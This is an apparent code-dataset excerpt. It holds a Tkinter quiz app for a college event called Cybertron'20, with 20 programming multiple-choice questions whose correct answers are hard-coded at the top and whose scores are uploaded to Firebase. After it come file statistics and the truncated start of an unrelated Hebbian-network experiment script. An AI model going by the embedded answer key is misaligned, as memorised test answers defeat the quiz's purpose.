global answer1,answer2,anslist
anslist = []
answer1 = '2'
answer2 = '1'
answer3 = '2'
answer4 = '2'
answer5 = '1'
answer6 = '2'
answer7 = '3'
answer8 = '4'
answer9 = '3'
answer10 = '3'
answer11 = '1'
answer12 = '2'
answer13 = '3'
answer14 = '3'
answer15 = '3'
answer16 = '4'
answer17 = '2'
answer18 = '4'
answer19 = '3'
answer20 = '3'
self.master=master
master.title('First Round')
self.frame = Frame(master,width=1000, height=600, bg='black')
self.frame.pack()
self.heading = Label(self.frame, text="Kalasalingam Institute of Technology", font=('arial 30 bold'), fg='black', bg='lightgreen')
self.heading.place(x=180, y=20)
self.title = Label(self.frame, text="Cybertron'20", font=('arial 30 bold'), fg='black', bg='lightgreen')
self.title.place(x=350, y=100)
self.name = Label(self.frame, text="Name :", font=('arial 13'), fg='black', bg='lightgreen')
self.name.place(x=300, y=200)
self.nameentry = Entry(self.frame,width=50)
self.nameentry.place(x=400,y=200)
self.clg = Label(self.frame, text="College :", font=('arial 13'), fg='black', bg='lightgreen')
self.clg.place(x=300, y=250)
self.clgentry = Entry(self.frame,width=50)
self.clgentry.place(x=400,y=250)
self.mail = Label(self.frame, text="Mail :", font=('arial 13'), fg='black', bg='lightgreen')
self.mail.place(x=300, y=300)
self.mailentry = Entry(self.frame,width=50)
self.mailentry.place(x=400,y=300)
self.start = Button(self.frame,width=10,text="Start",command = self.start)
self.start.place(x=380,y=350)
self.secondwin = Toplevel()
self.secondwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame1 = Frame(self.secondwin,width=1000, height=600, bg='black')
self.frame1.pack()
self.event = Label(self.secondwin, text="Capture The Flag", font=('arial 30 bold'), fg='black', bg='lightgreen')
self.event.place(x=300, y=20)
self.q1 = Image.open("images/q1-small.png")
self.render = ImageTk.PhotoImage(self.q1)
self.img = Label(self.secondwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q1():
global ans,crtans
ans = str(var.get())
if ans == answer1:
crtans = crtans+1
#Question 1
var = IntVar()
self.R1 = Radiobutton(self.secondwin, text="A) 6, 10, 8 ", variable=var, value=1,bg='lightgreen',
command=q1)
self.R1.place(x=500,y=100)
self.R2 = Radiobutton(self.secondwin, text="B) 4, 8, 4", variable=var, value=2,bg='lightgreen',
command=q1)
self.R2.place(x=500,y=150)
self.R3 = Radiobutton(self.secondwin, text="C) 2, 4, 4", variable=var, value=3,bg='lightgreen',
command=q1)
self.R3.place(x=500,y=200)
self.R4 = Radiobutton(self.secondwin, text="D) 2, 8, 4", variable=var, value=4,bg='lightgreen',
command=q1)
self.R4.place(x=500,y=250)
self.q2 = Image.open("images/q2-small.png")
self.render = ImageTk.PhotoImage(self.q2)
self.img = Label(self.secondwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
'''self.q2 = Label(self.secondwin, text="2)How to declare a variable?", font=('arial 15'), fg='black',
bg='lightgreen')
self.q2.place(x=20, y=300)'''
def q2():
global ans1,crtans
ans1 = str(var1.get())
print(ans1)
if ans1 == answer2:
crtans = crtans+1
#Question 2
var1 = IntVar()
self.R5 = Radiobutton(self.secondwin, text="A) 101010", variable=var1, value=1,bg='lightgreen',
command=q2)
self.R5.place(x=500,y=350)
self.R6 = Radiobutton(self.secondwin, text="B) 0xxa5f1010", variable=var1, value=2,bg='lightgreen',
command=q2)
self.R6.place(x=500,y=400)
self.R7 = Radiobutton(self.secondwin, text="C) Run time error", variable=var1, value=3,bg='lightgreen',
command=q2)
self.R7.place(x=500,y=450)
self.R8 = Radiobutton(self.secondwin, text="D) No Output", variable=var1, value=4,bg='lightgreen',
command=q2)
self.R8.place(x=500,y=500)
self.secondnext = Button(self.secondwin,width=10,text="NEXT",command = self.secondnext)
self.secondnext.place(x=800,y=550)
self.secondback = Button(self.secondwin,width=10,text="BACK",command = self.secondback)
self.secondback.place(x=700,y=550)
self.secondwin.withdraw()
self.thirdwin = Toplevel()
self.thirdwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame2 = Frame(self.thirdwin,width=1000, height=600, bg='black')
self.frame2.pack()
self.q3 = Image.open("images/q3-small.png")
self.render = ImageTk.PhotoImage(self.q3)
self.img = Label(self.thirdwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q3():
global ans2,crtans
ans2 = str(var2.get())
if ans2 == answer3:
crtans = crtans+1
#Question 3
var2 = IntVar()
self.R9 = Radiobutton(self.thirdwin, text="A) 0", variable=var2, value=1,bg='lightgreen',
command=q3)
self.R9.place(x=500,y=100)
self.R10 = Radiobutton(self.thirdwin, text="B) Error because of incorrect line-1 only.", variable=var2, value=2,bg='lightgreen',
command=q3)
self.R10.place(x=500,y=150)
self.R11 = Radiobutton(self.thirdwin, text="C) Error because of incorrect line-1 and line-2.", variable=var2, value=3,bg='lightgreen',
command=q3)
self.R11.place(x=500,y=200)
self.R12 = Radiobutton(self.thirdwin, text="D) Error because of incorrect line-2 only.", variable=var2, value=4,bg='lightgreen',
command=q3)
self.R12.place(x=500,y=250)
self.q4 = Image.open("images/q4-small.png")
self.render = ImageTk.PhotoImage(self.q4)
self.img = Label(self.thirdwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
'''self.q2 = Label(self.secondwin, text="2)How to declare a variable?", font=('arial 15'), fg='black',
bg='lightgreen')
self.q2.place(x=20, y=300)'''
def q4():
global ans3,crtans
ans3 = str(var3.get())
print(ans3)
if ans3 == answer4:
crtans = crtans+1
#Question 4
var3 = IntVar()
self.R13 = Radiobutton(self.thirdwin, text="A) 0", variable=var3, value=1,bg='lightgreen',
command=q4)
self.R13.place(x=500,y=350)
self.R14 = Radiobutton(self.thirdwin, text="B) Runtime error", variable=var3, value=2,bg='lightgreen',
command=q4)
self.R14.place(x=500,y=400)
self.R15 = Radiobutton(self.thirdwin, text="C) 5", variable=var3, value=3,bg='lightgreen',
command=q4)
self.R15.place(x=500,y=450)
self.R16 = Radiobutton(self.thirdwin, text="D) compilation error", variable=var3, value=4,bg='lightgreen',
command=q4)
self.R16.place(x=500,y=500)
self.thirdnext = Button(self.thirdwin,width=10,text="NEXT",command = self.thirdnext)
self.thirdnext.place(x=800,y=550)
self.thirdback = Button(self.thirdwin,width=10,text="BACK",command = self.thirdback)
self.thirdback.place(x=700,y=550)
self.thirdwin.withdraw()
self.forthwin = Toplevel()
self.forthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame3 = Frame(self.forthwin,width=1000, height=600, bg='black')
self.frame3.pack()
self.q5 = Image.open("images/q5-small.png")
self.render = ImageTk.PhotoImage(self.q5)
self.img = Label(self.forthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q5():
global ans4,crtans
ans4 = str(var4.get())
print(ans4)
if ans4 == answer5:
crtans = crtans+1
#Question 5
var4 = IntVar()
self.R17 = Radiobutton(self.forthwin, text="A) address address value", variable=var4, value=1,bg='lightgreen',
command=q5)
self.R17.place(x=500,y=100)
self.R18 = Radiobutton(self.forthwin, text="B) address value value", variable=var4, value=2,bg='lightgreen',
command=q5)
self.R18.place(x=500,y=150)
self.R19 = Radiobutton(self.forthwin, text="C) address address address", variable=var4, value=3,bg='lightgreen',
command=q5)
self.R19.place(x=500,y=200)
self.R20 = Radiobutton(self.forthwin, text="D) compilation error", variable=var4, value=4,bg='lightgreen',
command=q5)
self.R20.place(x=500,y=250)
self.q6 = Image.open("images/q6-small.png")
self.render = ImageTk.PhotoImage(self.q6)
self.img = Label(self.forthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q6():
global ans5,crtans
ans5 = str(var5.get())
print(ans5)
if ans5 == answer6:
crtans = crtans+1
#Question 6
var5 = IntVar()
self.R21 = Radiobutton(self.forthwin, text="A) No output", variable=var5, value=1,bg='lightgreen',
command=q6)
self.R21.place(x=500,y=350)
self.R22 = Radiobutton(self.forthwin, text="B) compile time error", variable=var5, value=2,bg='lightgreen',
command=q6)
self.R22.place(x=500,y=400)
self.R23 = Radiobutton(self.forthwin, text="C) 1", variable=var5, value=3,bg='lightgreen',
command=q6)
self.R23.place(x=500,y=450)
self.R24 = Radiobutton(self.forthwin, text="D) 4", variable=var5, value=4,bg='lightgreen',
command=q6)
self.R24.place(x=500,y=500)
self.forthnext = Button(self.forthwin,width=10,text="NEXT",command = self.forthnext)
self.forthnext.place(x=800,y=550)
self.forthback = Button(self.forthwin,width=10,text="BACK",command = self.forthback)
self.forthback.place(x=700,y=550)
self.forthwin.withdraw()
self.fifthwin = Toplevel()
self.fifthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame3 = Frame(self.fifthwin,width=1000, height=600, bg='black')
self.frame3.pack()
self.q7 = Image.open("images/q7-small.png")
self.render = ImageTk.PhotoImage(self.q7)
self.img = Label(self.fifthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q7():
global ans6,crtans
ans6 = str(var6.get())
print(ans6)
if ans6 == answer7:
crtans = crtans+1
#Question 7
var6 = IntVar()
self.R25 = Radiobutton(self.fifthwin, text="A) The control won’t fall into the for loop", variable=var6, value=1,bg='lightgreen',
command=q7)
self.R25.place(x=500,y=100)
self.R26 = Radiobutton(self.fifthwin, text="B) Numbers will be displayed until the signed limit of short and throw a run time error", variable=var6, value=2,bg='lightgreen',
command=q7)
self.R26.place(x=500,y=150)
self.R27 = Radiobutton(self.fifthwin, text="C) ) Numbers will be displayed until the signed limit of short and program will \nsuccessfully terminate", variable=var6, value=3,bg='lightgreen',
command=q7)
self.R27.place(x=500,y=200)
self.R28 = Radiobutton(self.fifthwin, text="D) This program will get into an infinite loop and keep printing numbers with no errors", variable=var6, value=4,bg='lightgreen',
command=q7)
self.R28.place(x=500,y=250)
self.q8 = Image.open("images/q8-small.png")
self.render = ImageTk.PhotoImage(self.q8)
self.img = Label(self.fifthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q8():
global ans7,crtans
ans7 = str(var7.get())
print(ans7)
if ans7 == answer8:
crtans = crtans+1
#Question 8
var7 = IntVar()
self.R21 = Radiobutton(self.fifthwin, text="A) 0.000000 1.000000 2.000000", variable=var7, value=1,bg='lightgreen',
command=q8)
self.R21.place(x=500,y=350)
self.R22 = Radiobutton(self.fifthwin, text="B) 2.000000", variable=var7, value=2,bg='lightgreen',
command=q8)
self.R22.place(x=500,y=400)
self.R23 = Radiobutton(self.fifthwin, text="C) Compile time error", variable=var7, value=3,bg='lightgreen',
command=q8)
self.R23.place(x=500,y=450)
self.R24 = Radiobutton(self.fifthwin, text="D) 3.000000", variable=var7, value=4,bg='lightgreen',
command=q8)
self.R24.place(x=500,y=500)
self.fifthnext = Button(self.fifthwin,width=10,text="NEXT",command = self.fifthnext)
self.fifthnext.place(x=800,y=550)
self.fifthback = Button(self.fifthwin,width=10,text="BACK",command = self.fifthback)
self.fifthback.place(x=700,y=550)
self.fifthwin.withdraw()
self.sixthwin = Toplevel()
self.sixthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame4 = Frame(self.sixthwin,width=1000, height=600, bg='black')
self.frame4.pack()
self.q9 = Image.open("images/q9-small.png")
self.render = ImageTk.PhotoImage(self.q9)
self.img = Label(self.sixthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q9():
global ans8,crtans
ans8 = str(var8.get())
print(ans8)
if ans8 == answer9:
crtans = crtans+1
#Question 9
var8 = IntVar()
self.R29 = Radiobutton(self.sixthwin, text="A) 5", variable=var8, value=1,bg='lightgreen',
command=q9)
self.R29.place(x=500,y=100)
self.R30 = Radiobutton(self.sixthwin, text="B) 0", variable=var8, value=2,bg='lightgreen',
command=q9)
self.R30.place(x=500,y=150)
self.R31 = Radiobutton(self.sixthwin, text="C) Syntax Error", variable=var8, value=3,bg='lightgreen',
command=q9)
self.R31.place(x=500,y=200)
self.R32 = Radiobutton(self.sixthwin, text="D) 05", variable=var8, value=4,bg='lightgreen',
command=q9)
self.R32.place(x=500,y=250)
self.q10 = Image.open("images/q10-small.png")
self.render = ImageTk.PhotoImage(self.q10)
self.img = Label(self.sixthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q10():
global ans9,crtans
ans9 = str(var9.get())
print(ans9)
if ans9 == answer10:
crtans = crtans+1
#Question 10
var9 = IntVar()
self.R33 = Radiobutton(self.sixthwin, text="A) 11 33", variable=var9, value=1,bg='lightgreen',
command=q10)
self.R33.place(x=500,y=350)
self.R34 = Radiobutton(self.sixthwin, text="B) Error", variable=var9, value=2,bg='lightgreen',
command=q10)
self.R34.place(x=500,y=400)
self.R35 = Radiobutton(self.sixthwin, text="C) exception", variable=var9, value=3,bg='lightgreen',
command=q10)
self.R35.place(x=500,y=450)
self.R36 = Radiobutton(self.sixthwin, text="D) 11 -33", variable=var9, value=4,bg='lightgreen',
command=q10)
self.R36.place(x=500,y=500)
self.fifthnext = Button(self.sixthwin,width=10,text="NEXT",command = self.sixthnext)
self.fifthnext.place(x=800,y=550)
self.sixthback = Button(self.sixthwin,width=10,text="BACK",command = self.sixthback)
self.sixthback.place(x=700,y=550)
self.sixthwin.withdraw()
self.seventhwin = Toplevel()
self.seventhwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame5 = Frame(self.seventhwin,width=1000, height=600, bg='black')
self.frame5.pack()
self.q11 = Image.open("images/q11-small.png")
self.render = ImageTk.PhotoImage(self.q11)
self.img = Label(self.seventhwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q11():
global ans10,crtans
ans10 = str(var10.get())
print(ans10)
if ans10 == answer11:
crtans = crtans+1
#Question 11
var10 = IntVar()
self.R37 = Radiobutton(self.seventhwin, text="A) Garbage value", variable=var10, value=1,bg='lightgreen',
command=q11)
self.R37.place(x=500,y=100)
self.R38 = Radiobutton(self.seventhwin, text="B) 1", variable=var10, value=2,bg='lightgreen',
command=q11)
self.R38.place(x=500,y=150)
self.R39 = Radiobutton(self.seventhwin, text="C) 0", variable=var10, value=3,bg='lightgreen',
command=q11)
self.R39.place(x=500,y=200)
self.R40 = Radiobutton(self.seventhwin, text="D) Error", variable=var10, value=4,bg='lightgreen',
command=q11)
self.R40.place(x=500,y=250)
self.q12 = Image.open("images/q12-small.png")
self.render = ImageTk.PhotoImage(self.q12)
self.img = Label(self.seventhwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q12():
global ans11,crtans
ans11 = str(var11.get())
print(ans11)
if ans11 == answer12:
crtans = crtans+1
#Question 12
var11 = IntVar()
self.R41 = Radiobutton(self.seventhwin, text="A) 5", variable=var11, value=1,bg='lightgreen',
command=q12)
self.R41.place(x=500,y=350)
self.R42 = Radiobutton(self.seventhwin, text="B) 6", variable=var11, value=2,bg='lightgreen',
command=q12)
self.R42.place(x=500,y=400)
self.R43 = Radiobutton(self.seventhwin, text="C) 14", variable=var11, value=3,bg='lightgreen',
command=q12)
self.R43.place(x=500,y=450)
self.R44 = Radiobutton(self.seventhwin, text="D) Compilation Error", variable=var11, value=4,bg='lightgreen',
command=q12)
self.R44.place(x=500,y=500)
self.seventhnext = Button(self.seventhwin,width=10,text="NEXT",command = self.seventhnext)
self.seventhnext.place(x=800,y=550)
self.seventhback = Button(self.seventhwin,width=10,text="BACK",command = self.seventhback)
self.seventhback.place(x=700,y=550)
self.seventhwin.withdraw()
#----------------------------------------------------------------------#
self.eighthwin = Toplevel()
self.eighthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame6 = Frame(self.eighthwin,width=1000, height=600, bg='black')
self.frame6.pack()
self.q13 = Image.open("images/q13-small.png")
self.render = ImageTk.PhotoImage(self.q13)
self.img = Label(self.eighthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q13():
global ans12,crtans
ans12 = str(var12.get())
print(ans12)
if ans12 == answer13:
crtans = crtans+1
#Question 13
var12 = IntVar()
self.R45 = Radiobutton(self.eighthwin, text="A) The program has a compile error because the size of the array \nwasn’t specified when declaring the array.", variable=var12, value=1,bg='lightgreen',
command=q13)
self.R45.place(x=500,y=100)
self.R46 = Radiobutton(self.eighthwin, text="B) The program has a runtime error because the array elements are not initialized.", variable=var12, value=2,bg='lightgreen',
command=q13)
self.R46.place(x=500,y=150)
self.R47 = Radiobutton(self.eighthwin, text="C) The program runs fine and displays x[0] is 0.", variable=var12, value=3,bg='lightgreen',
command=q13)
self.R47.place(x=500,y=200)
self.R48 = Radiobutton(self.eighthwin, text="D) The program has a runtime error because the array element x[0] is not defined.", variable=var12, value=4,bg='lightgreen',
command=q13)
self.R48.place(x=500,y=250)
self.q14 = Image.open("images/q14-small.png")
self.render = ImageTk.PhotoImage(self.q14)
self.img = Label(self.eighthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q14():
global ans13,crtans
ans13 = str(var13.get())
print(ans13)
if ans13 == answer14:
crtans = crtans+1
#Question 14
var13 = IntVar()
self.R49 = Radiobutton(self.eighthwin, text="A) 0", variable=var13, value=1,bg='lightgreen',
command=q14)
self.R49.place(x=500,y=350)
self.R50 = Radiobutton(self.eighthwin, text="B) 5", variable=var13, value=2,bg='lightgreen',
command=q14)
self.R50.place(x=500,y=400)
self.R51 = Radiobutton(self.eighthwin, text="C) Exception is thrown", variable=var13, value=3,bg='lightgreen',
command=q14)
self.R51.place(x=500,y=450)
self.R52 = Radiobutton(self.eighthwin, text="D) Returns the index of “Hari”", variable=var13, value=4,bg='lightgreen',
command=q14)
self.R52.place(x=500,y=500)
self.eighthnext = Button(self.eighthwin,width=10,text="NEXT",command = self.eighthnext)
self.eighthnext.place(x=800,y=550)
self.eighthback = Button(self.eighthwin,width=10,text="BACK",command = self.eighthback)
self.eighthback.place(x=700,y=550)
self.eighthwin.withdraw()
#=======================================================================================#
self.ninthwin = Toplevel()
self.ninthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame7 = Frame(self.ninthwin,width=1000, height=600, bg='black')
self.frame7.pack()
self.q15 = Image.open("images/q15-small.png")
self.render = ImageTk.PhotoImage(self.q15)
self.img = Label(self.ninthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q15():
global ans14,crtans
ans14 = str(var14.get())
print(ans14)
if ans14 == answer15:
crtans = crtans+1
#Question 15
var14 = IntVar()
self.R53 = Radiobutton(self.ninthwin, text="A) 123", variable=var14, value=1,bg='lightgreen',
command=q15)
self.R53.place(x=500,y=100)
self.R54 = Radiobutton(self.ninthwin, text="B) 1", variable=var14, value=2,bg='lightgreen',
command=q15)
self.R54.place(x=500,y=150)
self.R55 = Radiobutton(self.ninthwin, text="C) Error", variable=var14, value=3,bg='lightgreen',
command=q15)
self.R55.place(x=500,y=200)
self.R56 = Radiobutton(self.ninthwin, text="D) 1 2 3", variable=var14, value=4,bg='lightgreen',
command=q15)
self.R56.place(x=500,y=250)
self.q16 = Image.open("images/q16-small.png")
self.render = ImageTk.PhotoImage(self.q16)
self.img = Label(self.ninthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q16():
global ans15,crtans
ans15 = str(var15.get())
print(ans15)
if ans15 == answer16:
crtans = crtans+1
#Question 16
var15 = IntVar()
self.R57 = Radiobutton(self.ninthwin, text="A) Cybertron", variable=var15, value=1,bg='lightgreen',
command=q16)
self.R57.place(x=500,y=350)
self.R58 = Radiobutton(self.ninthwin, text="B) CYBERTRON", variable=var15, value=2,bg='lightgreen',
command=q16)
self.R58.place(x=500,y=400)
self.R59 = Radiobutton(self.ninthwin, text="C) False", variable=var15, value=3,bg='lightgreen',
command=q16)
self.R59.place(x=500,y=450)
self.R60 = Radiobutton(self.ninthwin, text="D) True", variable=var15, value=4,bg='lightgreen',
command=q16)
self.R60.place(x=500,y=500)
self.ninthnext = Button(self.ninthwin,width=10,text="NEXT",command = self.ninthnext)
self.ninthnext.place(x=800,y=550)
self.ninthback = Button(self.ninthwin,width=10,text="BACK",command = self.ninthback)
self.ninthback.place(x=700,y=550)
self.ninthwin.withdraw()
#______________________________________________________________________________________________#
self.tenthwin = Toplevel()
self.tenthwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame8 = Frame(self.tenthwin,width=1000, height=600, bg='black')
self.frame8.pack()
self.q17 = Image.open("images/q17-small.png")
self.render = ImageTk.PhotoImage(self.q17)
self.img = Label(self.tenthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q17():
global ans16,crtans
ans16 = str(var16.get())
print(ans16)
if ans16 == answer17:
crtans = crtans+1
#Question 17
var16 = IntVar()
self.R61 = Radiobutton(self.tenthwin, text="A) Type Error: can only concatenate list (not “int”) to list", variable=var16, value=1,bg='lightgreen',
command=q17)
self.R61.place(x=500,y=100)
self.R62 = Radiobutton(self.tenthwin, text="B) 11", variable=var16, value=2,bg='lightgreen',
command=q17)
self.R62.place(x=500,y=150)
self.R63 = Radiobutton(self.tenthwin, text="C) 12", variable=var16, value=3,bg='lightgreen',
command=q17)
self.R63.place(x=500,y=200)
self.R64 = Radiobutton(self.tenthwin, text="D) 38", variable=var16, value=4,bg='lightgreen',
command=q17)
self.R64.place(x=500,y=250)
self.q18 = Image.open("images/q18-small.png")
self.render = ImageTk.PhotoImage(self.q18)
self.img = Label(self.tenthwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q18():
global ans17,crtans
ans17 = str(var17.get())
print(ans17)
if ans17 == answer18:
crtans = crtans+1
#Question 18
var17 = IntVar()
self.R65 = Radiobutton(self.tenthwin, text="A) [5, 2, 3, 4] [5, 2, 3, 4] [1, 2, 3, 4] [1, 2, 3, 4]", variable=var17, value=1,bg='lightgreen',
command=q18)
self.R65.place(x=500,y=350)
self.R66 = Radiobutton(self.tenthwin, text="B) [[5], 2, 3, 4] [[5], 2, 3, 4] [[5], 2, 3, 4] [1, 2, 3, 4]", variable=var17, value=2,bg='lightgreen',
command=q18)
self.R66.place(x=500,y=400)
self.R67 = Radiobutton(self.tenthwin, text="C) [5, 2, 3, 4] [5, 2, 3, 4] [5, 2, 3, 4] [1, 2, 3, 4]", variable=var17, value=3,bg='lightgreen',
command=q18)
self.R67.place(x=500,y=450)
self.R68 = Radiobutton(self.tenthwin, text="D) [[5], 2, 3, 4] [[5], 2, 3, 4] [1, 2, 3, 4] [1, 2, 3, 4]", variable=var17, value=4,bg='lightgreen',
command=q18)
self.R68.place(x=500,y=500)
self.tenthnext = Button(self.tenthwin,width=10,text="NEXT",command = self.tenthnext)
self.tenthnext.place(x=800,y=550)
self.tenthback = Button(self.tenthwin,width=10,text="BACK",command = self.tenthback)
self.tenthback.place(x=700,y=550)
self.tenthwin.withdraw()
#____________________________________________---------------------------------------------#
self.lastwin = Toplevel()
self.lastwin.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.frame9 = Frame(self.lastwin,width=1000, height=600, bg='black')
self.frame9.pack()
self.q19 = Image.open("images/q19-small.png")
self.render = ImageTk.PhotoImage(self.q19)
self.img = Label(self.lastwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=100)
def q19():
global ans18,crtans
ans18 = str(var18.get())
print(ans18)
if ans18 == answer19:
crtans = crtans+1
#Question 19
var18 = IntVar()
self.R69 = Radiobutton(self.lastwin, text="A) KeyError", variable=var18, value=1,bg='lightgreen',
command=q19)
self.R69.place(x=500,y=100)
self.R70 = Radiobutton(self.lastwin, text="B) {0: 1, 7: 0, 1: 1, 8: 0}", variable=var18, value=2,bg='lightgreen',
command=q19)
self.R70.place(x=500,y=150)
self.R71 = Radiobutton(self.lastwin, text="C) {0: 0, 7: 0, 1: 1, 8: 1}", variable=var18, value=3,bg='lightgreen',
command=q19)
self.R71.place(x=500,y=200)
self.R72 = Radiobutton(self.lastwin, text="D) {1: 1, 7: 2, 0: 1, 8: 1}", variable=var18, value=4,bg='lightgreen',
command=q19)
self.R72.place(x=500,y=250)
self.q20 = Image.open("images/q20-small.png")
self.render = ImageTk.PhotoImage(self.q20)
self.img = Label(self.lastwin, image=self.render)
self.img.image = self.render
self.img.place(x=50, y=350)
def q20():
global ans19,crtans
ans19 = str(var19.get())
print(ans19)
if ans19 == answer20:
crtans = crtans+1
#Question 20
var19 = IntVar()
self.R73 = Radiobutton(self.lastwin, text="A) 100", variable=var19, value=1,bg='lightgreen',
command=q20)
self.R73.place(x=500,y=350)
self.R74 = Radiobutton(self.lastwin, text="B) Compilation error", variable=var19, value=2,bg='lightgreen',
command=q20)
self.R74.place(x=500,y=400)
self.R75 = Radiobutton(self.lastwin, text="C) Runtime error", variable=var19, value=3,bg='lightgreen',
command=q20)
self.R75.place(x=500,y=450)
self.R76 = Radiobutton(self.lastwin, text="D) None of these", variable=var19, value=4,bg='lightgreen',
command=q20)
self.R76.place(x=500,y=500)
self.save = Button(self.lastwin,width=10,text="Save",command = self.save)
self.save.place(x=800,y=550)
self.lastback = Button(self.lastwin,width=10,text="BACK",command = self.lastback)
self.lastback.place(x=700,y=550)
self.lastwin.withdraw()
def save(self):
print("Done")
self.name = self.nameentry.get()
self.clg = self.clgentry.get()
self.mail = self.mailentry.get()
data_to_upload = {'Name' : self.name,
'College' : self.clg,
'Mail' : self.mail,
'Correct' : crtans}
result = fbconn.post('/candidate/',data_to_upload)
self.save.config(state="disabled")
self.answer()
def answer(self):
if answer1==ans:
anslist.append('1')
else:
anslist.append('0')
if answer2==ans1:
anslist.append('1')
else:
anslist.append('0')
print(anslist)
def start(self):
self.master.withdraw()
self.secondwin.deiconify()
def secondnext(self):
print("Done")
self.secondwin.withdraw()
self.thirdwin.deiconify()
def thirdnext(self):
print("Third Next")
self.thirdwin.withdraw()
self.forthwin.deiconify()
def forthnext(self):
print("Forth Next")
self.forthwin.withdraw()
self.fifthwin.deiconify()
def fifthnext(self):
print("Fifth Next")
self.fifthwin.withdraw()
self.sixthwin.deiconify()
def sixthnext(self):
print("Sixth Next")
self.sixthwin.withdraw()
self.seventhwin.deiconify()
def seventhnext(self):
print("Seventh Next")
self.seventhwin.withdraw()
self.eighthwin.deiconify()
def eighthnext(self):
print("Eighth Next")
self.eighthwin.withdraw()
self.ninthwin.deiconify()
def ninthnext(self):
print("Ninth Next")
self.ninthwin.withdraw()
self.tenthwin.deiconify()
def tenthnext(self):
print("Tentn Next")
self.tenthwin.withdraw()
self.lastwin.deiconify()
def lastnext(self):
print("Last Next")
def secondback(self):
print("Back")
self.secondwin.withdraw()
self.master.deiconify()
def thirdback(self):
self.thirdwin.withdraw()
self.secondwin.deiconify()
def forthback(self):
self.forthwin.withdraw()
self.thirdwin.deiconify()
def fifthback(self):
self.fifthwin.withdraw()
self.forthwin.deiconify()
def sixthback(self):
self.sixthwin.withdraw()
self.fifthwin.deiconify()
def seventhback(self):
self.seventhwin.withdraw()
self.sixthwin.deiconify()
def eighthback(self):
self.eighthwin.withdraw()
self.seventhwin.deiconify()
def ninthback(self):
self.ninthwin.withdraw()
self.eighthwin.deiconify()
def tenthback(self):
self.tenthwin.withdraw()
self.ninthwin.deiconify()
def lastback(self):
self.lastwin.withdraw()
self.tenthwin.deiconify()
root = Tk()
obj = FirstRound(root)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.mainloop()
| 37.853583 | 206 | 0.555373 | 4,576 | 36,453 | 4.391827 | 0.097028 | 0.039409 | 0.075633 | 0.039807 | 0.627457 | 0.341942 | 0.215704 | 0.157038 | 0.147435 | 0.133254 | 0 | 0.086289 | 0.297726 | 36,453 | 962 | 207 | 37.892931 | 0.69875 | 0.016213 | 0 | 0.313187 | 0 | 0.006868 | 0.108442 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06044 | false | 0 | 0.004121 | 0 | 0.065934 | 0.04533 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a9d57be733f7ec06133940f72c9adc60cb07fd | 2,491 | py | Python | swap.py | garrettkatz/ghu | 2bf25ac6f8e82d3e7231c3381f7a4946db6dc59f | [
"MIT"
] | null | null | null | swap.py | garrettkatz/ghu | 2bf25ac6f8e82d3e7231c3381f7a4946db6dc59f | [
"MIT"
] | null | null | null | swap.py | garrettkatz/ghu | 2bf25ac6f8e82d3e7231c3381f7a4946db6dc59f | [
"MIT"
] | null | null | null | """
Swap input (rinp) on output (rout) with one extra registers (rtmp)
"""
import numpy as np
import torch as tr
import matplotlib.pyplot as pt
from ghu import *
from codec import Codec
from controller import Controller
from lvd import lvd
from reinforce import reinforce
if __name__ == "__main__":
print("*******************************************************")
# Configuration
num_symbols = 4
layer_sizes = {"rinp": 64, "rout":64, "rtmp": 64}
hidden_size = 32
rho = .99
plastic = []
num_episodes = 1000
# Setup GHU
symbols = [str(a) for a in range(num_symbols)]
pathways, associations = default_initializer( # all to all
layer_sizes.keys(), symbols)
codec = Codec(layer_sizes, symbols, rho=rho)
controller = Controller(layer_sizes, pathways, hidden_size, plastic)
ghu = GatedHebbianUnit(
layer_sizes, pathways, controller, codec,
batch_size = num_episodes, plastic = plastic)
ghu.associate(associations)
# Initialize layers
separator = "0"
ghu.fill_layers(separator)
# training example generation
def training_example():
# Randomly choose swap symbols (excluding 0 separator)
inputs = np.random.choice(symbols[1:], size=2, replace=False)
targets = inputs[::-1]
return inputs, targets
# reward calculation based on leading LVD at individual steps
def reward(ghu, targets, outputs):
idx = [i for i, out in enumerate(outputs) if out != separator]
outputs_ = [out for out in outputs if out != separator]
_, d = lvd(outputs_, targets)
r = np.zeros(len(outputs))
for i in range(1,d.shape[0]):
